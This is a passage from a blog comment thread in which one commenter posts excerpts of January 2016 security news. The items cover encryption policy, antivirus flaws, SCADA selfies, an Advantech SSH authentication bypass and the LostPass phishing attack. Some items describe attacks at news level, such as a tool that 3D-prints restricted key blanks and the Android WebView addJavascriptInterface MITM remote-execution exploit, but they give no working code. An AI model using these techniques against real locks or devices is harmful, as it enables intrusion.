    This website demonstrates a tool that generates a CAD model of a key blank from a single picture of a lock. This model can then be 3D printed cheaply in either plastic or metal from a number of services.

    Such a tool can be used to get around restricted keyways, a defense currently employed by locksmiths and designers to prevent a wide range of attacks including bumping, impressioning, privilege escalation, and teleduplication.

    What is this?

    This is a tool that can produce a 3D printable CAD model of a key blank (or with cuts if provided) from a single picture of the lock face.

    Why publish this tool?

    While it is possible that this website will aid attackers, we believe there is greater benefit in demonstrating to both lock designers and the public just how inexpensive these attacks are with modern tools. In addition, allowing a larger audience to use the tool may help defenders discover particular features of keyways that make them difficult to produce with this method, further assisting lock designers that want to defend against this technology.

    What attacks are enabled by 3D printing?

    3D printed keys can be used to enable privilege escalation attacks, where an attacker with access to a low-level change key can cheaply derive the master key for a system. This attack requires access to key blanks, which are difficult to obtain for restricted keyways.

    In addition, 3D printing can provide easier access to bump keys and can allow restricted keyway keys to be copied, either with direct access to the original key or by taking pictures of them remotely.

    What can we do to defend against 3D printed keys?

    Electronic locks or other non-mechanical locks (such as magnetic locks like EVVA MCS) may defend against attacks enabled by 3D printed keys, although they may have their own weaknesses. For example, electronic locks may be vulnerable to man-in-the-middle or remote code execution attacks.

    What if the tool doesn’t work on my image?

    The tool attempts to infer the keyway outline automatically, however, sometimes it does this incorrectly.

    Reply
22. January 19, 2016 at 6:49 am

    Tomi Engdahl says:

    Autopwn every Android < 4.2 device on your network using BetterCap and the "addJavascriptInterface" vulnerability.
    http://www.evilsocket.net/2016/01/18/autopwn-every-android-device-on-your-network-using-bettercap-the-and-addjavascriptinterface-vulnerability/

    Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
    One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.

    There's an excellent post about this vulnerability, long story short, if there's an app which is using a WebView UI control and it's declaring a custom javascript interface for it like so

    you can inject some special javascript into that page and make that device execute any shell command you want.

    In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.

    WebView addJavascriptInterface Remote Code Execution
    https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/

    Lately we have been analysing mobile advertising networks and in particular the Software Development Kit (SDK) that the networks make available to application developers for the purpose of monetising their applications. During this research we have found that a lot of applications expose mobile device users to the threat of compromise. We have found a number of exploitable (cross platform) vulnerabilities and expect to find more as research continues. We are in the early stages of the research and we will be conducting further research in this area; however we have decided to release this advisory now as to help Android users take appropriate actions to protect themselves.

    Many advertising networks make an SDK available to application developers to ‘ease’ integration. The SDK contains header files and a static library.

    The advertising networks require the application to display content within a WebKit WebView. WebKit is an open source web browser engine that powers browsers such as Google Chrome, Apple Safari, the default iOS and Android browsers etc. WebView is the core view class in the WebKit framework.

    Many free apps use a WebView to load HTML content as an in-process web browser and the advertising network SDK uses the browser instance to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary JavaScript into the WebView.

    Advertising networks gather metrics so that they can tailor campaigns and target specific ‘audiences’. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Advertising networks also want to leverage the mobile device platform to deliver ‘rich media’ advertisements. To achieve their goals, access to the platform/devices native capabilities is often required. This is realised by implementing a “native bridge”. It is possible to call ‘native’ code from a rendered WebView by using JavaScript. This is achieved on the Android platform in two different ways

    The WebView JavaScript bridge can be abused to execute arbitrary Java code, by using reflection to acquire a reference to a runtime object via the interface implemented in the Java code above.

    The issue has been disclosed publicly in an article authored by ‘Neil’ titled Abusing WebView JavaScript Bridges on December the 21st, 2012

    At this point, the attacker is able to perform a number of attacks against the device using drozer. The lowest impact attack would be downloading contents of the SD card and the exploited application’s data directory. However, depending on the device that was exploited this could extend to obtaining root privileges, retrieving other sensitive user data from the device or causing the user monetary loss.

    Reply
23. January 19, 2016 at 6:54 am

    Tomi Engdahl says:

    Ex-NSA boss says FBI director is wrong on encryption
    http://money.cnn.com/2016/01/13/technology/nsa-michael-hayden-encryption/index.html

    The FBI director wants the keys to your private conversations on your smartphone to keep terrorists from plotting secret attacks.

    But on Tuesday, the former head of the U.S. National Security Agency — the supreme experts on communications — said that would be a terrible idea.

    General Michael Hayden, now retired, was speaking at a cybersecurity conference in Miami Beach. He expressed his unwavering support for encryption, a feature that protects voice calls or texts by turning data into nonsensical, indecipherable code.

    “I disagree with [FBI director] Jim Comey,” Hayden said in a speech. “I actually think end-to-end encryption is good for America.”

    At issue here is whether companies like Apple (AAPL, Tech30) and Google (GOOGL, Tech30) should offer encryption to customers. It safeguards their devices from anyone trying to break in, whether it’s criminal hackers or snooping federal agents.

    The Obama administration, initially irked by the challenge posed to surveillance, has dropped any plans to push for laws that bar or limit encryption.

    There’s a consensus on this among mathematicians and cybersecurity experts. Encrypting data protects everything. It raises a wall that keeps out everyone. Forcing companies to keep an extra set of keys to unlock customer data makes them a target for foreign spies and criminal hackers too.

    “I know encryption represents a particular challenge for the FBI,” Hayden said. “But on balance, I actually think it creates greater security for the American nation than the alternative: a backdoor.”

    One of the attendees at the conference, Swedish cybersecurity expert Robert Malmgren, said the ex-NSA director recognizes a simple fact: It’s impossible to regulate a free, widely available software.

    “The bad guys will break the law anyway,” Malmgren said. “If encryption is outlawed, they don’t care. They don’t care about laws.”

    At times, the debate over encryption is overblown. In some cases, police actually have the capability to overcome encryption anyway.

    Reply
24. January 19, 2016 at 9:33 am

    Tomi Engdahl says:

    Antivirus software could make your company more vulnerable
    http://www.computerworld.com/article/3020445/security/antivirus-software-could-make-your-company-more-vulnerable.html?token=%23tk.CTWNLE_nlt_computerworld_security_2016-01-11&idg_eid=051598d6597df87056c54033166b3242&utm_source=Sailthru&utm_medium=email&utm_campaign=Computerworld%20Security%202016-01-11&utm_term=computerworld_security#tk.cw_nlt_computerworld_security_issues_2016-01-11

    Security researchers are worried that critical vulnerabilities in antivirus products are too easy to find and exploit

    Imagine getting a call from your company’s IT department telling you your workstation has been compromised and you should stop what you’re doing immediately. You’re stumped: You went through the company’s security training and you’re sure you didn’t open any suspicious email attachments or click on any bad links; you know that your company has a solid patching policy and the software on your computer is up to date; you’re also not the type of employee who visits non-work-related websites while on the job. So, how did this happen?

    A few days later, an unexpected answer comes down from the security firm that your company hired to investigate the incident: Hackers got in by exploiting a flaw in the corporate antivirus program installed on your computer, the same program that’s supposed to protect it from attacks. And all it took was for attackers to send you an email message that you didn’t even open.

    This scenario might sound far-fetched, but it’s not. According to vulnerability researchers who have analyzed antivirus programs in the past, such attacks are quite likely, and may already have occurred. Some of them have tried to sound the alarm about the ease of finding and exploiting critical flaws in endpoint antivirus products for years.

    Since June, researchers have found and reported several dozen serious flaws in antivirus products from vendors such as Kaspersky Lab, ESET, Avast, AVG Technologies, Intel Security (formerly McAfee) and Malwarebytes. Many of those vulnerabilities would have allowed attackers to remotely execute malicious code on computers, to abuse the functionality of the antivirus products themselves, to gain higher privileges on compromised systems and even to defeat the anti-exploitation defenses of third-party applications.

    Exploiting some of those vulnerabilities required no user interaction and could have allowed the creation of computer worms

    Attacks on the horizon

    Evidence suggests that attacks against antivirus products, especially in corporate environments, are both possible and likely. Some researchers believe that such attacks have already occurred, even though antivirus vendors might not be aware of them because of the very small number of victims.

    The intelligence agencies of various governments have long had an interest in antivirus flaws.

    Reply
25. January 19, 2016 at 10:49 am

    Tomi Engdahl says:

    Andy Greenberg / Wired:
    Silk Road’s dream of a free-trade zone on the dark web is dead: a collection of untrustworthy black market bazaars have failed to replace the Silk Road — The Silk Road’s Dark-Web Dream Is Dead — Not so long ago, the Silk Road was not only a bustling black market for drugs …

    The Silk Road’s Dark-Web Dream Is Dead
    http://www.wired.com/2016/01/the-silk-roads-dark-web-dream-is-dead/

    Not so long ago, the Silk Road was not only a bustling black market for drugs but a living representation of every cryptoanarchist’s dream: a trusted trading ground on the Internet where neither the government’s laws nor the Drug War they’ve spawned could reach. Today, that illicit narco-utopia is long gone, its once-secret server in an evidence storage room and its creator Ross Ulbricht fighting a last ditch appeal to escape life in prison.

    But more than two years since the FBI’s Silk Road takedown, the dark web markets Ulbricht inspired are suffering a less tangible but more fundamental kind of failure: the Silk Road’s dream has died, too.

    Over the last year, buyers and sellers in the dark web’s underground economy have been shaken again and again when the cryptographically hidden marketplaces they use to trade contraband goods ranging from drugs to stolen credit cards to forgeries have suddenly disappeared. More often than not, those disappearances involve the sites’ administrators running off with a significant chunk of their customers’ money.

    The result has been that the libertarian free-trade zone that the Silk Road once stood for has devolved into a more fragmented, less ethical, and far less trusted collection of scam-ridden black market bazaars. Instead of the Silk Road’s principled—if still very illegal—alternative to the violence and unpredictable products of street dealers, the dark web’s economy has become nearly as shady as the Internet back alley politicians and moralizing TV pundits have long compared it to.

    Dark web market admins are learning that “if you’re trustworthy, you stay up for a while, the heat increases, and eventually you get nailed by the feds,” says Nick Weaver, a Berkeley computer science researcher who has studied the Silk Road and other dark web markets. Instead, more and more markets are opting to “exit scam,” stealing the bitcoins users have stored in escrow and in their on-site accounts and going offline without warning. “The most viable exit strategy,” Weaver says, “is to rip and run.”

    Reply
26. January 19, 2016 at 11:02 am

    Tomi Engdahl says:

    Now, in a hurry, “Safe Harbor is too important to fail ‘

    Brussels – Concerns about the NSA snooping and uncertainty about the future of the safe harbor procedure were highlighted Microsoft’s General Counsel Brad Smith spoke, organized by Carnegie Europe’s data protection conference in Brussels on Monday.

    “Safe Harbor is too important to be allowed to fall over,”

    “Europeans must be able to continue to be confident that their data is secure and privacy are catered for,”

    Smith likened the development of data protection pendulum. “After the 9/11 attacks, surveillance was expanded and the laws were tightened everywhere. Snowden revelations turned the pendulum in the other direction and now is the time to emphasize the importance of data protection and human rights. ”

    But the United States and the NSA are not the only interested party information. 90 per cent of European data has been on the European servers and the level of data protection laws of the EU Member States varies greatly.

    “Internet in the early days was to that line would be completely free. Now the situation is different: when the data moves around the earth, the law must be to follow along with, “Smith described.

    However, the law is seriously lagging behind technological development.

    Especially in the US laws are still on the same level as they were in 1986.

    Smith believes that Americans and Europeans will find a common ground on data protection – but it takes time and persistent work.

    Source: http://www.tivi.fi/Kaikki_uutiset/nyt-on-kiire-safe-harbor-on-liian-tarkea-kaatuakseen-6246060

    Reply
27. January 19, 2016 at 11:10 am

    Tomi Engdahl says:

    Security flaw in Advantech gateway leaves the industrial equipment were open – any password to visit

    Manufacturer programming mistake to leave Advantech gateway using embedded into industrial devices open to anyone. Advantech tcp / ip gateways parents serial port equipped industrial equipment can be connected to the Internet for remote management.

    Advantech updated their equipment the last time last fall and removed gateways kovakoodun ssh server password. However, the update does not lacked even greater problem with equipment modified ssh server accepts any password.

    Problem found Rapid7, the company’s researchers. The vulnerability effort published in the autumn of 1.98-versioned operating system software Advantech EKI-1322 gateway. The most recent, published at the end of December, 2.00 version corrects the problem.

    Rapid7 says that the problem arose when the Dropbear called ssh server was changed so much that it is no longer in effect required the users identification.

    Source: http://www.tivi.fi/Kaikki_uutiset/turva-aukko-jattaa-teollisuuslaitteet-auki-nettiin-mika-tahansa-salasana-kay-6246028

    Reply
28. January 19, 2016 at 11:57 am

    Tomi Engdahl says:

    SCADA “Selfies” a Big Give Away To Hackers
    http://it.slashdot.org/story/16/01/19/0310229/scada-selfies-a-big-give-away-to-hackers

    The world’s governments are on notice that their critical infrastructure is vulnerable after an apparent cyberattack darkened 80,000 households in three regions of Ukraine last month. But on the question of safeguarding utilities, operators of power plants, water treatment facilities, and other industrial operations might do well to worry more about Instagram than hackers, according to a report by Christian Science Monitor Passcode. Speaking at a gathering of industrial control systems experts last week, Sean McBride of the firm iSight Partners said that social media oversharing is wellspring of information that could be useful to attackers interested in compromising critical infrastructure. Among the valuable information he’s found online: workplace selfies on Instagram and Facebook that reveal details of supervisory control and data acquisition, or SCADA, systems.

    “No SCADA selfies!” said Mr. McBride at the S4 Conference in Miami Thursday. “Don’t make an adversary’s job easier.” iSight has found examples of SCADA selfies at sensitive facilities and warns that such photos may unwittingly reveal critical information that operators would prefer to keep secret.

    Worried about cyberattacks on US power grid? Stop taking selfies at work
    http://www.csmonitor.com/World/Passcode/2016/0115/Worried-about-cyberattacks-on-US-power-grid-Stop-taking-selfies-at-work?cmpid=TW

    Experts warn that malicious hackers gain valuable insight when companies and employees reveal too much information on the Web – especially when they work at sensitive facilities.

    The world’s governments are on notice that their critical infrastructure is vulnerable after an apparent cyberattack darkened 80,000 households in three regions of Ukraine last month.

    Social media oversharing is wellspring of information that could be useful to attackers interested in compromising critical infrastructure, said Sean McBride, senior threat intelligence analyst at iSight Partners. Among the valuable information he’s found online: workplace selfies on Instagram and Facebook that reveal details of supervisory control and data acquisition, or SCADA, systems.

    iSight has found numerous examples of SCADA selfies at sensitive facilities and warns that such photos may unwittingly reveal critical information that operators would prefer to keep secret. The firm’s researchers have also discovered panoramic pictures of control room and video walk-throughs of facilities.

    In addition to posting videos and photos on the Web, corporate websites can divulge valuable information to adversaries. For instance, organization charts or lists of employees with contact information accessible via the utility website are valuable sources of information for would-be attackers, says McBride.

    These kinds of easily accessible images have aided critical infrastructure attacks in the past.

    In 2011, industrial control systems expert Ralph Langner used an image of a SCADA control system monitor in one of the photos to match the configuration of the Natanz centrifuges to configuration information in the Stuxnet malicious software created to hobble the facility.

    Today, McBride said that he and fellow researchers have used open-source information from media, government, and private sources to identify 15 facilities in the US that are critical to the operation of the electric grid.

    McBride suggested that critical infrastructure operators think like hackers before posting photos online: “Ask yourself, ‘What do my adversaries know about me and the organizations I support.’ “

    Reply
29. January 19, 2016 at 12:00 pm

    Tomi Engdahl says:

    Ukraine claims that Russia launched a cyber attack on Kiev airport
    Can’t we all just get along?
    http://www.theinquirer.net/inquirer/news/2442200/ukraine-claims-that-russia-launched-a-cyber-attack-on-kiev-airport

    UKRAINE HAS accused unfriendly neighbour Russia of hacking into computing systems at Kiev airport.

    Worse than that, perhaps, is the threat of BlackEnergy malware, the use of which came to us via the security industry earlier this month. This new terror was used against Ukrainian utility firms recently, according to ESET, and more than likely has a Russian theme tune.

    A report on Reuters said the attack on Kiev airport used BlackEnergy and has been officially tagged by the military as being of Russian origin.

    “The control centre of the server, where the attacks originate, is in Russia,” military spokesman Andriy Lysenko confirmed to Reuters, while the airport people raised the spectre of BlackEnergy by saying that the authorities are looking into it.

    The Ukrainian state-run Computer Emergency Response Team (CERT UA) has waved the update stick and recommended that anyone who is responsible for any kind of network should get on top of their log files and look for anything unusual.

    Ukraine says to review cyber defenses after airport targeted from Russia
    http://www.reuters.com/article/us-ukraine-cybersecurity-malware-idUSKCN0UW0R0

    Ukrainian authorities will review the defenses of government computer systems, including at airports and railway stations, after a cyber attack on Kiev’s main airport was launched from a server in Russia, officials told Reuters on Monday.

    Malware similar to that which attacked three Ukrainian power firms in late December was detected last week in a computer in the IT network of Kiev’s main airport, Boryspil. The network includes the airport’s air traffic control.

    Although there is no suggestion at this stage that Russia’s government was involved, the cyber attacks have come at a time of badly strained relations between Ukraine and Russia over a nearly two-year-long separatist conflict in eastern Ukraine.

    Ukraine’s state-run Computer Emergency Response Team (CERT-UA) issued a warning on Monday of the threat of more attacks.

    “The control center of the server, where the attacks originate, is in Russia,” military spokesman Andriy Lysenko said by telephone, adding that the malware had been detected early in the airport’s system and no damage had been done.

    Reply
30. January 19, 2016 at 12:02 pm

    Tomi Engdahl says:

    LastPass admits to a phishing problem and boosts two-factor authentication
    Don’t panic. It looks like LastPass did that for you
    http://www.theinquirer.net/inquirer/news/2442216/lastpass-admits-to-a-phishing-problem-and-boosts-two-factor-authentication

    LASTPASS HAS REACTED to reports about its place in a phishing problem by explaining things away and wrapping what’s left in barbed wire and promises.

    The information is delivered as a response to work done by a security researcher called Sean Cassidy who discovered the possibility of the phishing attack and released the code on GitHub. He reckons that its use will yield the guts of a LastPass account.

    “I call this attack LostPass. LostPass works because LastPass displays messages in the browser that attackers can fake. Users can’t tell the difference between a fake LostPass message and the real thing because there is no difference. It’s pixel-for-pixel the same notification and log-in screen,” Cassidy said in a blog post.

    LastPass replied in a blog post that the company jumped right to work on the problem and has gone about nailing planks of wood across virtual doors and that kind of thing.

    “The first line of defence that LastPass has introduced is preventing the malicious page from actually logging the user out of LastPass. Even though the malicious page shows a fake LastPass notification saying the user has been logged out and needs to log-in again, the user can see that the LastPass extension itself in their browser toolbar is still logged in,” the firm explained.

    sean cassidy : LostPass
    https://www.seancassidy.me/lostpass.html

    Reply
31. January 19, 2016 at 12:09 pm

    Tomi Engdahl says:

    Advantech authentication forgets the authentication part
    Industrial gateways also carry a debugging backdoor
    http://www.theregister.co.uk/2016/01/19/advantech_authentication_forgets_the_authentication_part/

    Advantech’s EKI series of Modbus-to-TCP/IP gateways have a critical authentication bug, according to HD Moore of Rapid7.

    Back in December, Moore made a bunch of disclosures about the same product (including Shellshock and Heartbleed exposure).

    His latest discovery is that the EKI’s Dropbear SSH daemon isn’t authenticating users.

    “As of the 1.98 version of the firmware, The Dropbear daemon included had been heavily modified. As a result, it does not actually enforce authentication. During testing, any user is able to able to bypass authentication by using any public key and password”, the company writes.

    Advantech has since patched the two bugs
    http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-T2M6NY&Doc_Source=Download

    Reply
32. January 19, 2016 at 12:11 pm

    Tomi Engdahl says:

    Facebook flushes cash and time into anti-bullying
    Mark Zuckerberg continues to bask in benevolence
    By Dave Neal
    http://www.theinquirer.net/inquirer/news/2442316/facebook-flushes-cash-and-time-into-anti-bullying

    21ST CENTURY gossip and petrol station Facebook has come out swinging in favour of the little man and has launched the Berlin-based Online Civil Courage Initiative (OCCI) and asked people to share just a bit more personal information about themselves.

    Mark Zuckerberg, the big man on his self-made campus, has been keen on doing the right thing recently and often has his efforts thrown back in his face.

    These days he has big cash and big power and the means to do something to hit the bullies back, hence the OCCI which was announced on Facebook, which makes sense.

    The idea is for people to share their bad experiences on Facebook. This would create open discussion, reopen old wounds, and give some people the opportunity to shill ‘Man Up’ books at internet users.

    “Together we can ensure that the voices of peace, truth and tolerance will be heard. The best cure for bad ideas are good ideas. The best remedy for hate is tolerance. Counter speech is incredibly strong – and it takes time, energy and courage.

    Reply
33. January 19, 2016 at 12:13 pm

    Tomi Engdahl says:

    Hyatt Hotel guests should be on credit card high alert
    You done mighta got hacked
    http://www.theinquirer.net/inquirer/news/2442234/recent-hyatt-hotel-guests-should-be-on-credit-card-high-alert

    ROADSIDE BEDROOM FACILITATOR the Hyatt Hotel chain has released a whack of detail about a hack on the firm last year and warned that customers may have details that are lost in the wild.

    The hack was reported by internet equaliser Brian Krebs in December. Hyatt provided a statement at the time, but Krebbs suggested that it was light on detail.

    “A small percentage of the at-risk cards were used at spas, golf shops, car parks and a limited number of front desks, or provided to a sales office during this period. The at-risk window for a limited number of locations began on or shortly after 30 July 2015.”

    That is a long time in this business we call security and Hyatt has been advised to see whether it is doing the right things, particularly in terms of point-of-sale (PoS) systems and hacking. PoS systems, as we have learned already, can be a very weak link in the chain.

    “It appears that a good portion of breached data came from the restaurant side of the hotel chain’s facilities,”

    “These are often integrated PoS [systems] running applications in an environment that is not as secure as modern hardened payment terminals designed to capture payment data and implement encryption independent from the PoS itself. Such PoS systems are thus a target for payment-specific malware.

    Reply
34. January 19, 2016 at 12:14 pm

    Tomi Engdahl says:

    Bitcoin mainstay withdraws funds and knowhow from ‘failed experiment’
    Wait till they see our genetically engineered waspadillo
    http://www.theinquirer.net/inquirer/news/2442261/bitcoin-mainstay-withdraws-funds-and-knowhow-from-failed-experiment

    A MAJOR PROPONENT of the bitcoin cryptocurrency has labelled it a “failed project” and withdrawn his support.

    Zurich-based developer and ex-Googler Mike Hearn published a blog post this weekend in which he announced that he had sold all his bitcoins and retired from developing for the virtual currency.

    The currency has increased hugely in popularity since its inception, but this has created a whole host of problems, ranging from its rapid (and, let’s face it, predictable) adoption as the currency of criminals, to its increasing complexity on the technical side which is making transactions slow down or fail entirely. Some even predict that the infrastructure will actually grind to a complete halt one day.

    The resolution of the Bitcoin experiment
    https://medium.com/@octskyward/the-resolution-of-the-bitcoin-experiment-dabb30201f7#.lmfvt09zg

    Reply
35. January 19, 2016 at 12:19 pm

    Tomi Engdahl says:

    Adblock urges advertising companies to follow its criteria for acceptable ads, a feat that surely makes it the bore at the cocaine content confab.

    Ad blocking is not just a tool of content pirates who would rather stem revenue streams than stare at flashing gifs; the dangerous and explosive rise of malvertising gives blockers, including script blockers, a major security benefit since it reduces net user exposure to ransomware and other malware.

    Source: http://www.theregister.co.uk/2016/01/19/adblock_party_flops_have_invite_to_admen_confab_slop_chopped/

    Reply
36. January 19, 2016 at 12:53 pm

    Tomi Engdahl says:

    Super-computers aren’t super-secure
    US National Science Foundation flings US$5 million at scientific computing infosec
    http://www.theregister.co.uk/2016/01/18/nsf_sees_gaps_in_hpc_security_pours_in_money/

    America’s National Science Foundation is slinging US$5 million to help improve the security of scientific high-performance computing (HPC) infrastructure.

    The money will be spent by the Center for Trustworthy Scientific Cyberinfrastructure (CTSC), run by the universities of Illinois and Wisconsin-Madison, and the Pittsburgh Supercomputing Centre (PSC).

    Reply
37. January 19, 2016 at 12:55 pm

    Tomi Engdahl says:

    20KB trojan turns on banks in Singapore, Indonesia
    Fifth Tinba iteration ‘Tinbapore’ found and flagged
    http://www.theregister.co.uk/2016/01/19/bite_size_thief_now_raiding_asia_pac_banks/

    The infamous Tinba financial trojan has been updated and is now targeting banks in the Asia Pacific region.

    Malware bods from security company F5 refer to the fifth iteration of the trojan as Tinbapore since it began moving 70 percent of its infection base to the region.

    About 30 percent of infections are located Singapore and 20 percent in Indonesia. Only five percent are in Australia.

    Reply
38. January 19, 2016 at 1:01 pm

    Tomi Engdahl says:

    Clinton Hints At Tech Industry Compromise Over Encryption
    http://it.slashdot.org/story/16/01/18/1659205/clinton-hints-at-tech-industry-compromise-over-encryption

    At the Democratic presidential debate last night, Marques Brownlee asked the candidates a pointed question about whether the government should require tech companies to implement backdoors in their encryption, and how we should balance privacy with security. The responses were not ideal for those who recognize the problems with backdoors. Martin O’Malley said the government should have to get a warrant, but skirted the rest of the issue. Bernie Sanders said government must “have Silicon Valley help us”

    But the most interesting comment came from Hillary Clinton. After mentioning that Obama Administration officials had “started the conversation” with tech companies on the encryption issue

    Reply
39. January 19, 2016 at 1:28 pm

    Tomi Engdahl says:

    Here’s What Tor’s Data Looks Like as It Flows Around the World
    http://www.wired.com/2016/01/heres-what-tors-data-looks-like-as-it-flows-around-the-world/

    https://torflow.uncharted.software/

    Reply
40. January 20, 2016 at 10:29 am

    Tomi Engdahl says:

    Paul Lilly / Maximum PC:
    Intel announces sixth generation Core vPro processors with Intel Authenticate, an embedded multifactor authentication technology — Intel Bakes Multifactor Authentication into 6th Generation Core vPro Platform — Intel Authenticate brings security to a new level

    Intel Bakes Multifactor Authentication into 6th Generation Core vPro
    http://www.maximumpc.com/intel-bakes-multifactor-authentication-into-6th-generation-core-vpro-platform/

    Intel Authenticate brings security to a new level

    “Older laptops can cost businesses $4,203 per year, for every three PCs, in maintenance and lost productivity. ”

    Increased Security

    There have been a lot of security breaches over the past couple of years. According to Intel, over half of today’s data breaches start with misused or stolen credentials.

    To buck this trend, Intel is previewing a new security solution called Intel Authenticate. It’s an embedded multifactor authentication technology that uses a combination of up to three identifying factors at the same time, those being something you know, something you have, and something your are.

    “By doing so, the most common software based attacks that steal user credentials through viruses or malware are rendered ineffective. Intel delivers a secure PIN, a Bluetooth proximity factor with your Android or iPhone, a logical location factor with vPro systems and fingerprint biometrics. IT can choose the number and combination of factors they desire depending on their security needs and preferences for their users,” Garrison explains, Vice President and General Manager of Intel Business and Client Platforms.

    Intel Authenticate Identity Protection Intel IT Center
    https://www.youtube.com/watch?v=0gFZG7uLHtU

    Intel® Authenticate is a breakthrough in identity protection. Storing multi-factor security credentials and IT policies in hardware instead of in the operating system or third-party software making it harder for advanced threats to reach them.

    Reply
41. January 20, 2016 at 4:10 pm

    Tomi Engdahl says:

    European human rights court rules mass surveillance illegal
    Decision may kill off UK government spying law
    http://www.theregister.co.uk/2016/01/20/human_rights_court_rules_mass_surveillance_illegal/

    The European Court of Human Rights (ECHR) has ruled that mass surveillance is illegal, in a little-noticed case in Hungary.

    In a judgment last week, the court ruled that the Hungarian government had violated article 8 of the European Convention on Human Rights (the right to privacy) due to its failure to include “sufficiently precise, effective and comprehensive” measures that would limit surveillance to only people it suspected of crimes.

    The court said the Hungarian government should be required to interpret the law in a narrow fashion and “verify whether sufficient reasons for intercepting a specific individual’s communications exist in each case.”

    Or in other words, every individual case must be looked at carefully and a decision made on each. Which is clearly impossible if the law is taken to carry out mass surveillance, i.e., hoovering up information over the internet and then searching in it.

    The court made repeated references to another recent ECHR decision in December in which the Russian government was also found to have violated the same section for its mass surveillance of telephone calls.

    It should be noted that the decision does not ban the surveillance of citizens, nor does it require judicial oversight of such surveillance orders. But it is quite clear that such surveillance must be targeted at an individual and not used more broadly.

    So what’s the impact?

    The decision cannot stop the UK government, for example, from passing legislation that allows for mass surveillance.

    But it does mean that if the UK does, it will almost certainly be taken to the ECHR and found to have violated the European Convention. The UK government can of course continue to ignore that ruling, but it would face fines and it would lose international standing and reputation.

    Reply
42. January 20, 2016 at 4:13 pm

    Tomi Engdahl says:

    Microsoft: We’ve taken down the botnets. Europol: Would Sir like a kill switch, too?
    It’s like pulling a smoking car off the road … hang on
    http://www.theregister.co.uk/2016/01/19/microsoft_botnets_kill_switch/

    Last December, Microsoft intercepted traffic on users’ PCs and helped break up a botnet. And nobody complained. So the company very tentatively asked at a session on ethics and policy in Brussels this week whether it should do more.

    John Frank, Microsoft’s VP of European Government Affairs, explained how Microsoft had helped white hats, the FBI and Europol take the Dorkbot botnet infrastructure offline.

    “We detect when your PC is infected and ‘phones home’ as much as four times an hour. We then redirect that back to our sink hole and identify that with our national computers, and work to get those machines cleaned up,” said Frank.

    But he hinted it could do more, with greater information sharing and co-ordination between technology companies, CERTS and crime fighters.

    “I wonder if we’re being ambitious enough with our cybersecurity policy?”

    More co-operation could pay dividends, Frank suggested, with platform companies like Microsoft and ISPs working more closely with Europol. Why should an “unsafe” (infected, remotely controlled) be permitted on the internet, when an unsafe car isn’t?

    “Perhaps we should treat it as a health issue,” he mused.

    Speaking for Europol, Olivier Burgersdijk, of the body’s European Cybercrime Centre, agreed in principle.

    “In your car you would immediately be stopped if something wasn’t working.” The same could apply to PCs that are “being infected and… being used for committing crimes.”

    But Europol doesn’t have the authority to do more than it already can, he noted.

    Kill switches are now mandatory on Californian phones, but disabling an infected PC doesn’t necessarily mean installing a “kill switch” at platform level. It could entail diverting traffic from known bad IP addresses, something Windows already does with your consent.

    And a kill switch is at odds with Microsoft’s view on backdoors for government encryption – the company is against them.

    Reply
43. January 20, 2016 at 4:15 pm

    Tomi Engdahl says:

    Bigger than Safe Harbor: Microsoft prez vows to take down US gov in data protection lawsuit
    All your stuff is readable by Uncle Sam. Worldwide
    http://www.theregister.co.uk/2016/01/18/microsoft_irish_warrant_case_data_protection_safe_harbor/

    Europeans should sit up and take more notice of Microsoft’s lawsuit against the US government over secret access to their data.

    Why? Because it affects much more of their data than the Safe Harbour case, according to Microsoft president and lead counsel Brad Smith.

    “The Department of Justice does not need to wait for data to come to the United States to examine it,” he explained. “It can force countries to give it your data without disclosing that access to government, or complying with any European law.”

    Smith said 90 per cent of Europeans’ data is affected by the Irish warrant case; far more data than is affected by the transatlantic flows governed by safe harbour rules, which Austrian Max Schrems exploded in a European court ruling last year.

    Microsoft has sued the US government, challenging its right to access European data in its Dublin data centre. The government can do so because it recognises no territorial limits to US power in its laws: everywhere in the world is the United States.

    Smith called it the “defining privacy issue for 2016”. 82 per cent of Facebook’s global user base is served by Dublin.

    Microsoft’s chief lawyer thought a safe harbour replacement would be reached eventually. Yet, because it’s “too important to fail”, it may not succeed in the current round of negotiations, which are set to end by January 31st.

    But he said it wouldn’t happen just with wishful thinking. The US, having promised to end bulk data collection on its citizens, needed to do a lot more.

    Smith didn’t sell his “trustee model” as a cure all, though. Designed to rebuild trust in American companies post-Schrems, the trustee model sees data ownership and management handed to a European company, in the first instances, a subsidiary of Deutsche Telekom.

    Reply
44. January 20, 2016 at 4:29 pm

    Tomi Engdahl says:

    Intel Thwarts Hackers
    New vPro Hardware Unites Business
    http://www.eetimes.com/document.asp?doc_id=1328715&amp;

    Intel announced it 6th Generation Core processors at the Gamecon Congress 2015 (Aug. 5-9, Cologne, Germany) however they left out secret details about new vPro on-chip hardware important to business uses. Of the half dozen new hardware capabilities in 6th Gen vPro Cores, the more important are Authenticate and Unite, both of which use on-chip hardware Intel claims is unhackable to verify the identity of users and to allow them to project their screens onto any WiDi (wireless display) in the world, respectively.

    “Authenticate is a new never before seem capability,” Garrison told EE Times. “It allows IT [the information technology department of a business] to guarantee the authenticity of a user using two-, three- or more factors, making break-ins from stolen credentials virtually a thing of the past.”

    Authenticate offers up to four other factors supported by, what it claims, is unhackable on-chip hardware, including PIN, proximity (of your phone via Bluetooth), your location (at office, at home or other defined location) and biometrics (such as fingerprint or retina scan).

    The other “big deal” with the 6th Gen VPro Cores for business, according to Intel, is its new Unite on-chip hardware. Unite allows business users to enter a six-digit PIN to display on any WiDi equipped display—usually in a conference room in the world—complete with integrated Skype for Business.

    Intel® Authenticate Technology: Hardware-Enhanced Security
    http://www.intel.com/content/www/us/en/architecture-and-technology/authenticate/intel-authenticate-is-hardware-enhanced-security.html

    Today, more than half of data breaches start with misused or stolen user credentials1. Eight character passwords that change every 90 days worked well a decade ago, but increasingly sophisticated attack methods like password cracking, phishing, or screen scraping, reveal the need for stronger identity protection. To better protect user credentials, organizations need to strengthen software-only security.

